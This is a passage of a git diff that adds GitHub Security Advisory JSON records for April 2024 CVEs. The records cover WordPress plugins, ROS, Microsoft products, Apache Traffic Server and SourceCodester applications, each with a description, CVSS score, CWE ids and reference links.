b/advisories/unreviewed/2024/04/GHSA-78c9-fpph-r266/GHSA-78c9-fpph-r266.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78c9-fpph-r266", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-30737" + ], + "details": "An issue was discovered in ROS Kinetic Kame in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, allows remote attackers to execute arbitrary code via packages or nodes within the ROS system.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30737" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30737" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-78gp-j22r-4mpj/GHSA-78gp-j22r-4mpj.json b/advisories/unreviewed/2024/04/GHSA-78gp-j22r-4mpj/GHSA-78gp-j22r-4mpj.json new file mode 100644 index 00000000000..33c4f8fe9d3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-78gp-j22r-4mpj/GHSA-78gp-j22r-4mpj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78gp-j22r-4mpj", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-1042" + ], + "details": "The WP Radio – Worldwide Online Radio Stations Directory for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple AJAX functions in all versions up to, and including, 3.1.9. This makes it possible for authenticated attackers, with subscriber access and above, to import radio stations, remove countries, and modify the plugin's settings, which can lead to Cross-Site Scripting, tracked separately in CVE-2024-1041.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1042" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/wp-radio" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b46e9771-37ff-4825-9af9-02ecde424653?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-78rg-c3vx-jc43/GHSA-78rg-c3vx-jc43.json b/advisories/unreviewed/2024/04/GHSA-78rg-c3vx-jc43/GHSA-78rg-c3vx-jc43.json new file mode 100644 index 00000000000..0d1bd9faa02 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-78rg-c3vx-jc43/GHSA-78rg-c3vx-jc43.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78rg-c3vx-jc43", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-1385" + ], + "details": "The WP-Stateless – Google Cloud Storage plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the dismiss_notices() function in all versions up to, and including, 3.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary option values to the current time, which may completely take a site offline.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1385" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035169%40wp-stateless&new=3035169%40wp-stateless&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9a475017-ef45-4614-bdc6-ddd619b8caf3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-78v4-x94j-xvq4/GHSA-78v4-x94j-xvq4.json b/advisories/unreviewed/2024/04/GHSA-78v4-x94j-xvq4/GHSA-78v4-x94j-xvq4.json new file mode 100644 index 00000000000..477a705661d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-78v4-x94j-xvq4/GHSA-78v4-x94j-xvq4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78v4-x94j-xvq4", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29043" + ], + "details": "Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29043" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7f4v-g439-hqw9/GHSA-7f4v-g439-hqw9.json b/advisories/unreviewed/2024/04/GHSA-7f4v-g439-hqw9/GHSA-7f4v-g439-hqw9.json new file mode 100644 index 00000000000..65b8a177191 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7f4v-g439-hqw9/GHSA-7f4v-g439-hqw9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f4v-g439-hqw9", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2693" + ], + "details": "The Link Whisper Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 0.7.1 via deserialization of untrusted input of the 'mfn-page-items' post meta value. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2693" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3057518/link-whisper/tags/0.7.2/core/Wpil/Editor/Muffin.php?old=3048109&old_path=link-whisper%2Ftags%2F0.7.1%2Fcore%2FWpil%2FEditor%2FMuffin.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5dd7cd-f96a-48df-a553-be5e59d8290f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7fjf-mf75-27gg/GHSA-7fjf-mf75-27gg.json b/advisories/unreviewed/2024/04/GHSA-7fjf-mf75-27gg/GHSA-7fjf-mf75-27gg.json new file mode 100644 index 00000000000..b9cb6cb2b80 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7fjf-mf75-27gg/GHSA-7fjf-mf75-27gg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fjf-mf75-27gg", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26220" + ], + "details": "Windows Mobile Hotspot Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26220" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26220" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-908" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7fvp-vcpm-j9mq/GHSA-7fvp-vcpm-j9mq.json b/advisories/unreviewed/2024/04/GHSA-7fvp-vcpm-j9mq/GHSA-7fvp-vcpm-j9mq.json new file mode 100644 index 00000000000..cfd02257e51 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7fvp-vcpm-j9mq/GHSA-7fvp-vcpm-j9mq.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fvp-vcpm-j9mq", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-3358" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Aplaya Beach Resort Online Reservation System 1.0. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument to leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259462 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3358" + }, + { + "type": "WEB", + "url": "https://github.com/qqqyc/vlun1/blob/main/Aplaya-Beach-Resort-Online-Reservation-System-12.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310229" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T04:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7g9p-6w9q-wc84/GHSA-7g9p-6w9q-wc84.json b/advisories/unreviewed/2024/04/GHSA-7g9p-6w9q-wc84/GHSA-7g9p-6w9q-wc84.json new file mode 100644 index 00000000000..499bcf80481 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7g9p-6w9q-wc84/GHSA-7g9p-6w9q-wc84.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7g9p-6w9q-wc84", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26213" + ], + "details": "Microsoft Brokering File System Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26213" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26213" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-822" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7gvv-9m7c-r39r/GHSA-7gvv-9m7c-r39r.json b/advisories/unreviewed/2024/04/GHSA-7gvv-9m7c-r39r/GHSA-7gvv-9m7c-r39r.json new file mode 100644 index 00000000000..9c33ee66084 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7gvv-9m7c-r39r/GHSA-7gvv-9m7c-r39r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7gvv-9m7c-r39r", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-21424" + ], + "details": "Azure Compute Gallery Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21424" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21424" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7hpg-wrjj-gghq/GHSA-7hpg-wrjj-gghq.json b/advisories/unreviewed/2024/04/GHSA-7hpg-wrjj-gghq/GHSA-7hpg-wrjj-gghq.json new file mode 100644 index 00000000000..a23a6d30dc9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7hpg-wrjj-gghq/GHSA-7hpg-wrjj-gghq.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hpg-wrjj-gghq", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-31309" + ], + "details": "HTTP/2 CONTINUATION DoS attack can cause Apache Traffic Server to consume more resources on the server.  Version from 8.0.0 through 8.1.9, from 9.0.0 through 9.2.3 are affected.\n\nUsers can set a new setting (proxy.config.http2.max_continuation_frames_per_minute) to limit the number of CONTINUATION frames per minute.  ATS does have a fixed amount of memory a request can use and ATS adheres to these limits in previous releases.\nUsers are recommended to upgrade to versions 8.1.10 or 9.2.4 which fixes the issue.\n\n", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31309" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/f9qh3g3jvy153wh82pz4onrfj1wh13kc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T12:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7jq6-7f95-hv67/GHSA-7jq6-7f95-hv67.json b/advisories/unreviewed/2024/04/GHSA-7jq6-7f95-hv67/GHSA-7jq6-7f95-hv67.json new file mode 100644 index 00000000000..cbed6f23dbe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7jq6-7f95-hv67/GHSA-7jq6-7f95-hv67.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jq6-7f95-hv67", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26228" + ], + "details": "Windows Cryptographic Services Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26228" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26228" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7jxc-j2vf-9mcr/GHSA-7jxc-j2vf-9mcr.json b/advisories/unreviewed/2024/04/GHSA-7jxc-j2vf-9mcr/GHSA-7jxc-j2vf-9mcr.json new file mode 100644 index 00000000000..fae96f28c20 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7jxc-j2vf-9mcr/GHSA-7jxc-j2vf-9mcr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7jxc-j2vf-9mcr", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-30977" + ], + "details": "An issue in Secnet Security Network Intelligent AC Management System v.1.02.040 allows a local attacker to escalate privileges via the password component.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30977" + }, + { + "type": "WEB", + "url": "https://github.com/wodi98k/zip_crack/blob/main/SecnetAC.pdf" + }, + { + "type": "WEB", + "url": "http://www.secnet.cn/newsdetail/388.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7m2v-r87h-vhc2/GHSA-7m2v-r87h-vhc2.json b/advisories/unreviewed/2024/04/GHSA-7m2v-r87h-vhc2/GHSA-7m2v-r87h-vhc2.json new file mode 100644 index 00000000000..27b4c472c46 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7m2v-r87h-vhc2/GHSA-7m2v-r87h-vhc2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7m2v-r87h-vhc2", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-21447" + ], + "details": "Windows Authentication Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21447" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21447" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7p3m-6wwx-vgfx/GHSA-7p3m-6wwx-vgfx.json b/advisories/unreviewed/2024/04/GHSA-7p3m-6wwx-vgfx/GHSA-7p3m-6wwx-vgfx.json new file mode 100644 index 00000000000..a1711e190c9 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7p3m-6wwx-vgfx/GHSA-7p3m-6wwx-vgfx.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p3m-6wwx-vgfx", + "modified": "2024-04-09T21:32:00Z", + "published": "2024-04-09T21:32:00Z", + "aliases": [ + "CVE-2024-2501" + ], + "details": "The Hubbub Lite – Fast, Reliable Social Sharing Buttons plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.33.1 via deserialization of untrusted input via the 'dpsp_maybe_unserialize' function. This makes it possible for authenticated attackers, with contributor access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2501" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/social-pug/trunk/inc/functions-post.php#L194" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/social-pug/trunk/inc/functions.php#L556" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?old_path=/social-pug/tags/1.33.1&old=3060042&new_path=/social-pug/tags/1.33.2&new=3060042&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3999c59-57a9-410c-a550-7d198bdb25ea?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7p73-h822-f5rv/GHSA-7p73-h822-f5rv.json b/advisories/unreviewed/2024/04/GHSA-7p73-h822-f5rv/GHSA-7p73-h822-f5rv.json new file mode 100644 index 00000000000..b1161cc9ccf --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7p73-h822-f5rv/GHSA-7p73-h822-f5rv.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p73-h822-f5rv", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:34Z", + "aliases": [ + "CVE-2024-3441" + ], + "details": "A vulnerability was found in SourceCodester Prison Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Employee/edit-profile.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-259694 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3441" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemSQL4.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259694" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259694" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7p7p-r9pc-pcmf/GHSA-7p7p-r9pc-pcmf.json b/advisories/unreviewed/2024/04/GHSA-7p7p-r9pc-pcmf/GHSA-7p7p-r9pc-pcmf.json new file mode 100644 index 00000000000..070182db804 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7p7p-r9pc-pcmf/GHSA-7p7p-r9pc-pcmf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p7p-r9pc-pcmf", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2024-0588" + ], + "details": "The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0588" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3058329/paid-memberships-pro/tags/3.0/includes/compatibility/lifterlms.php?old=2952976&old_path=paid-memberships-pro/trunk/includes/compatibility/lifterlms.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6fd87d34-2e7f-4c75-8816-b39820309077?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7pcc-7cq6-8v3x/GHSA-7pcc-7cq6-8v3x.json b/advisories/unreviewed/2024/04/GHSA-7pcc-7cq6-8v3x/GHSA-7pcc-7cq6-8v3x.json new file mode 100644 index 00000000000..0376a974c19 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7pcc-7cq6-8v3x/GHSA-7pcc-7cq6-8v3x.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pcc-7cq6-8v3x", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2023-6695" + ], + "details": "The Beaver Themer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.9 via the 'wpbb' shortcode. This makes it possible for authenticated attackers, with contributor access and above, to extract sensitive data including arbitrary user_meta values.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6695" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4165cff7-457d-4790-8678-84c4365a191a?source=cve" + }, + { + "type": "WEB", + "url": "https://www.wpbeaverbuilder.com/change-logs" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7pwv-85gj-57j4/GHSA-7pwv-85gj-57j4.json b/advisories/unreviewed/2024/04/GHSA-7pwv-85gj-57j4/GHSA-7pwv-85gj-57j4.json new file mode 100644 index 00000000000..460f84c4042 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7pwv-85gj-57j4/GHSA-7pwv-85gj-57j4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pwv-85gj-57j4", + "modified": "2024-04-06T06:31:08Z", + "published": "2024-04-06T06:31:08Z", + "aliases": [ + "CVE-2024-3361" + ], + "details": "A vulnerability has been found in SourceCodester Online Library System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/books/deweydecimal.php. The manipulation of the argument category leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259465 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3361" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-03" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310425" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7q39-mffw-pf43/GHSA-7q39-mffw-pf43.json b/advisories/unreviewed/2024/04/GHSA-7q39-mffw-pf43/GHSA-7q39-mffw-pf43.json new file mode 100644 index 00000000000..efbfeb2d92c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7q39-mffw-pf43/GHSA-7q39-mffw-pf43.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7q39-mffw-pf43", + "modified": "2024-04-09T06:30:44Z", + "published": "2024-04-09T06:30:44Z", + "aliases": [ + "CVE-2024-30690" + ], + "details": "An unauthorized node injection vulnerability has been identified in ROS2 Galactic Geochelone versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3, allows remote attackers to escalate privileges.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30690" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30690" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T06:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-7qfq-cp9v-rc33/GHSA-7qfq-cp9v-rc33.json b/advisories/unreviewed/2024/04/GHSA-7qfq-cp9v-rc33/GHSA-7qfq-cp9v-rc33.json new file mode 100644 index 00000000000..c9cdacb9269 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-7qfq-cp9v-rc33/GHSA-7qfq-cp9v-rc33.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qfq-cp9v-rc33", + "modified": "2024-04-08T12:30:32Z", + "published": "2024-04-08T12:30:32Z", + "aliases": [ + "CVE-2024-3439" + ], + "details": "A vulnerability was 